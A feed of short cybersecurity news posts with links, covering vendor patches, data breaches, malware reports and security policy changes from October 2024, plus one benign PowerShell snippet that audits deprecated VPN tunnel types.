 Atlassian Patches Vulnerabilities in Bitbucket, Confluence, Jira

Atlassian has announced security updates that resolve six high-severity vulnerabilities in Bitbucket, Confluence, and Jira Service Management products.

See more: https://www.securityweek.com/atlassian-patches-vulnerabilities-in-bitbucket-confluence-jira/

#cybersecurity #security 
 Roundcube Webmail Vulnerability Exploited in Government Attack

A threat actor was caught attempting to exploit a recent vulnerability in Roundcube Webmail against a governmental organization in a Commonwealth of Independent States (CIS) country, cybersecurity firm Positive Technologies reports.

Tracked as CVE-2024-37383 and described as a cross-site scripting (XSS) issue affecting the way Roundcube was handling SVG animate attributes, the bug was patched on May 19 in Roundcube Webmail versions 1.5.7 and 1.6.7.

See more: https://www.securityweek.com/roundcube-webmail-vulnerability-exploited-in-government-attack/

#cybersecurity #security 
 Internet Archive breached again through stolen access tokens

The Internet Archive was breached again, this time on their Zendesk email support platform after repeated warnings that threat actors stole exposed GitLab authentication tokens.

"Whether you were trying to ask a general question, or requesting the removal of your site from the Wayback Machine your data is now in the hands of some random guy. If not me, it'd be someone else."

BleepingComputer attempted to contact the Internet Archive numerous times, as recently as Friday, offering to share what they knew about how the breach occurred and why it was done, but we never received a response.

See more: https://www.bleepingcomputer.com/news/security/internet-archive-breached-again-through-stolen-access-tokens/

#cybersecurity #security 
 Cisco takes DevHub portal offline after hacker publishes stolen data

Cisco confirmed today that it took its public DevHub portal offline after a threat actor leaked "non-public" data, but it continues to state that there is no evidence that its systems were breached.

This statement comes after a threat actor known as IntelBroker claimed to have breached Cisco and attempted to sell data and source code stolen from the company.

Screenshots and files, provided to BleepingComputer, showed that the threat actor had access to most, if not all, of the data stored on this portal. This data included source code, configuration files with database credentials, technical documentation, and SQL files.

See more: https://www.bleepingcomputer.com/news/security/cisco-takes-devhub-portal-offline-after-hacker-publishes-stolen-data/

#cybersecurity #security 
 Internet Archive and Wayback Machine Resurrect After DDoS Wave

Most of Internet Archive’s services have resumed after a series of distributed denial-of-service (DDoS) attacks took the world’s largest digital library’s website offline several times over the past few days.

In a blog post published on October 18, the non-profit confirmed that many services are now up and running, including its Wayback Machine, Archive-It, scanning and national library crawls, email, blog, helpdesk and social media communications.

See more: https://www.infosecurity-magazine.com/news/internet-archive-wayback-machine/

#hacking 
 Intel, AMD CPUs on Linux impacted by newly disclosed Spectre bypass

The latest generations of Intel processors, including Xeon chips, and AMD's older microarchitectures on Linux are vulnerable to new speculative execution attacks that bypass existing ‘Spectre’ mitigations.

The vulnerabilities impact Intel's 12th, 13th, and 14th chip generations for consumers and the 5th and 6th generation of Xeon processors for servers, along with AMD's Zen 1, Zen 1+, and Zen 2 processors.

See more: https://www.bleepingcomputer.com/news/security/intel-amd-cpus-on-linux-impacted-by-newly-disclosed-spectre-bypass/

#cybersecurity #security 
 Undercover North Korean IT workers now steal data, extort employers

North Korean IT professionals who trick Western companies into hiring them are stealing data from the organizations' networks and asking for a ransom not to leak it.

They avoided video during calls or resorted to various tricks while on the job to hide their face during video conferences, such as using artificial intelligence tools.

Dispatching IT workers to seek employment at companies in wealthier nations is a tactic that North Korea has been using for years as a means to obtain privileged access for cyberattacks or to generate revenue for the country's weapons programs.

See more: https://www.bleepingcomputer.com/news/security/undercover-north-korean-it-workers-now-steal-data-extort-employers/

#cybersecurity #security 
 Microsoft Reveals macOS Vulnerability that Bypasses Privacy Controls in Safari Browser

Microsoft has disclosed details about a now-patched security flaw in Apple's Transparency, Consent, and Control (TCC) framework in macOS that has likely come under exploitation to get around a user's privacy preferences and access data.

The shortcoming, codenamed HM Surf by the tech giant, is tracked as CVE-2024-44133. It was addressed by Apple as part of macOS Sequoia 15 by removing the vulnerable code.

See more:
https://thehackernews.com/2024/10/microsoft-reveals-macos-vulnerability.html

#cybersecurity #security 
 Google: 70% of exploited flaws disclosed in 2023 were zero-days

Google Mandiant security analysts warn of a worrying new trend of threat actors demonstrating a better capability to discover and exploit zero-day vulnerabilities in software.

Specifically, of the 138 vulnerabilities disclosed as actively exploited in 2023, Mandiant says 97 (70.3%) were leveraged as zero-days.

See more: https://www.bleepingcomputer.com/news/security/google-70-percent-of-exploited-flaws-disclosed-in-2023-were-zero-days/

#cybersecurity #security 
 VMware Patches High-Severity SQL Injection Flaw in HCX Platform

VMWare on Wednesday called urgent attention to a critical remote code execution flaw haunting users of its enterprise-facing HCX application mobility platform.

The vulnerability, tagged as CVE-2024-38814, carries a CVSS severity score of 8.8/10 and allows attackers with non-administrator privileges to execute remote code on the HCX manager.

The security defect impacts multiple versions of the VMware HCX platform, including versions 4.8.x, 4.9.x, and 4.10.x. 

See more: https://www.securityweek.com/vmware-patches-high-severity-sql-injection-flaw-in-hcx-platform/

#cybersecurity #security 
 Understand these seven password attacks and how to stop them:

1. Brute-force attacks
2. Dictionary attacks
3. Password spraying
4. Credential stuffing
5. Phishing
6. Keylogger attack
7. Social engineering

See more: https://www.bleepingcomputer.com/news/security/understand-these-seven-password-attacks-and-how-to-stop-them/

#cybersecurity #security 
 Oracle Patches Over 200 Vulnerabilities With October 2024 CPU

Oracle on Tuesday announced 334 new security patches as part of its October 2024 Critical Patch Update (CPU), including 186 fixes for vulnerabilities that can be exploited remotely without authentication.

SecurityWeek has identified roughly 220 unique CVEs in Oracle’s October 2024 CPU. Approximately three dozen security patches resolve critical-severity flaws.

See more: https://www.securityweek.com/oracle-patches-over-200-vulnerabilities-with-october-2024-cpu/

#cybersecurity #security 
 Experts Play Down Significance of Chinese Quantum “Hack”

Security experts have urged caution after a stream of doom-laden reports in recent days claimed Chinese researchers have cracked military-grade encryption using quantum computing technology.

“While the research shows quantum computing's potential threat to classical encryption, the attack was executed on a 22-bit key – far shorter than the 2048 or 4096-bit keys commonly used in practice today. The suggestion that this poses an imminent risk to widely used encryption standards is misleading,” DigiCert head of R&D Avesta Hojjati argued.

“This research, while intriguing, does not equate to an immediate quantum apocalypse.”

See more: https://www.infosecurity-magazine.com/news/experts-play-down-chinese-quantum/

#cybersecurity #security 
 How does #zcash work? Understanding zerocash and zcash from Zellic.

See more:
https://www.zellic.io/blog/how-does-zcash-work/ 
 LunarDao - DarkFiSquad is raising funds to support anon developers who research & build anonymity tech.

See more:
https://lunardao.net/darkfi_raise_guide_updated.html

Twitter post:
https://x.com/lunarpunksquad/status/1846192056982532588

#privacy 
 TrickMo Banking Trojan Can Now Capture Android PINs and Unlock Patterns

"This new addition enables the threat actor to operate on the device even while it is locked," Zimperium security researcher Aazim Yaswant said in an analysis published last week.

Some of the new variants of the malware have also been equipped to harvest the device's unlock pattern or PIN by presenting the victim with a deceptive user interface (UI): a full-screen HTML page that mimics the device's actual unlock screen. It collects and sends the user's unlock pattern/PIN, alongside a unique device identifier, to an attacker-controlled server.

See more: https://thehackernews.com/2024/10/trickmo-banking-trojan-can-now-capture.html

#cybersecurity #security 
 GitHub Patches Critical Vulnerability in Enterprise Server

Code hosting platform GitHub has released patches for a critical-severity vulnerability in GitHub Enterprise Server that could lead to unauthorized access to affected instances.

Tracked as CVE-2024-9487 (CVSS score of 9.5), the bug was introduced in May 2024 as part of the remediations released for CVE-2024-4985, a critical authentication bypass defect allowing attackers to forge SAML responses and gain administrative access to the Enterprise Server.

The vulnerability was resolved in GitHub Enterprise Server versions 3.11.16, 3.12.10, 3.13.5, and 3.14.2, which also address a medium-severity information disclosure bug that could be exploited through malicious SVG files.

See more: https://www.securityweek.com/github-patches-critical-vulnerability-in-enterprise-server/

#cybersecurity #security 
 New FIDO proposal lets you securely move passkeys across platforms

The Fast IDentity Online (FIDO) Alliance has published a working draft of a new specification that aims to enable the secure transfer of passkeys between different providers.

Passkeys are a method of authentication without a password that leverages public-key cryptography to authenticate users without requiring them to remember or manage long strings of characters.

The new specification that FIDO proposes essentially addresses the lack of widely accepted secure standards for credential transfer, eliminating the complications or practical limitations when switching between providers.

The drafts were developed with the contribution of specialists from FIDO associate members and stakeholders like Dashlane, Bitwarden, 1Password, NordPass, and Google.

See more: https://www.bleepingcomputer.com/news/security/new-fido-proposal-lets-you-securely-move-passkeys-across-platforms/

#cybersecurity #security 
 Free TornadoCash or Samurai wallet devs! 

nostr:nevent1qqs25t60qr8j0uxr36rwzwtnmq82xzlj42jcxatghs3u0rjuzpw6klgppemhxue69uhkummn9ekx7mp0qgsd3fhv7rped64g77dyf9l7ndmae9mkxdz37099cc6wyzr9jytxg7crqsqqqqqp8nf3k7 
 Microsoft deprecates PPTP and L2TP VPN protocols in Windows Server 

Microsoft has officially deprecated the Point-to-Point Tunneling Protocol (PPTP) and Layer 2 Tunneling Protocol (L2TP) in future versions of Windows Server, recommending admins switch to different protocols that offer increased security.

PPTP is vulnerable to offline brute force attacks of captured authentication hashes, and L2TP provides no encryption unless coupled with another protocol, like IPsec. However, if L2TP/IPsec is not configured correctly, it can introduce weaknesses that make it susceptible to attacks.
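As an added example (not code from Microsoft's announcement or the article), the following PowerShell snippet audits the VPN connections configured on a Windows client and flags the ones still using the deprecated PPTP or L2TP tunnel types, so an admin can see what needs migrating to IKEv2 or SSTP. It relies on the built-in VpnClient module's Get-VpnConnection cmdlet; the connection name and server address in the commented replacement command are placeholders.

```powershell
# Added audit helper: list VPN connections whose tunnel type is PPTP or L2TP.
# Get-VpnConnection reports TunnelType as Pptp, L2tp, Sstp, Ikev2 or Automatic.
$deprecatedTunnelTypes = @('Pptp', 'L2tp')

function Get-DeprecatedVpnConnection {
    # Per-user connections plus machine-wide (-AllUserConnection) ones.
    $connections = @(Get-VpnConnection -ErrorAction SilentlyContinue) +
                   @(Get-VpnConnection -AllUserConnection -ErrorAction SilentlyContinue)

    foreach ($conn in $connections) {
        if ($deprecatedTunnelTypes -contains $conn.TunnelType) {
            [pscustomobject]@{
                Name          = $conn.Name
                ServerAddress = $conn.ServerAddress
                TunnelType    = $conn.TunnelType
                # L2TP is only acceptable with IPsec; PPTP should be retired outright.
                Recommended   = 'Ikev2 or Sstp'
            }
        }
    }
}

# Print the findings as a table; an empty result means no deprecated tunnels remain.
Get-DeprecatedVpnConnection | Format-Table -AutoSize

# Placeholder replacement connection (adjust name, server and auth method to your environment):
# Add-VpnConnection -Name 'Corp-IKEv2' -ServerAddress 'vpn.example.com' `
#     -TunnelType Ikev2 -AuthenticationMethod MachineCertificate
```

Run it in an elevated session to see machine-wide connections as well as the current user's; the commented Add-VpnConnection line shows the shape of the IKEv2 replacement the post recommends.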

"The move is part of Microsoft's strategy to enhance security and performance by transitioning users to more robust protocols like Secure Socket Tunneling Protocol (SSTP) and Internet Key Exchange version 2 (IKEv2)," Microsoft announced in a post this week.

See more:
https://www.bleepingcomputer.com/news/microsoft/microsoft-deprecates-pptp-and-l2tp-vpn-protocols-in-windows-server/

#cybersecurity #privacy #security
 Pokémon Developer Game Freak Suffers Data Breach 

Game Freak, the company behind the Pokémon franchise, is dealing with a security breach that has compromised the data of more than 2,600 employees and partners. 

The data leak first came to light on a forum known as 4chan earlier this month before it began circulating on social media and other online forums.

The data allegedly includes inside information of video games, source code for existing frames, and data on unreleased Pokémon games.

See more:
https://www.infosecurity-magazine.com/news/pokemon-developer-game-freak-data
 https://www.darkreading.com/cyberattacks-data-breaches/insider-info-pokemon-allegedly-leaked-gaming-hack

#security #cybersecurity #privacy 
 Google warns uBlock Origin and other extensions may be disabled soon

The warning includes a link to a Google support bulletin that states the browser extension may be disabled to protect users' privacy and security.

"To better protect your privacy and security, Chrome and the Chrome Web Store require extensions to be up-to-date with new requirements," reads Google's support bulletin.

"uBO is a Manifest v2 extension, hence the warning in your Google Chrome browser. There is no Manifest v3 version of uBO, hence the browser will suggest alternative extensions as a replacement for uBO."

See more: https://www.bleepingcomputer.com/news/google/google-warns-ublock-origin-and-other-extensions-may-be-disabled-soon/

#security #cybersecurity #privacy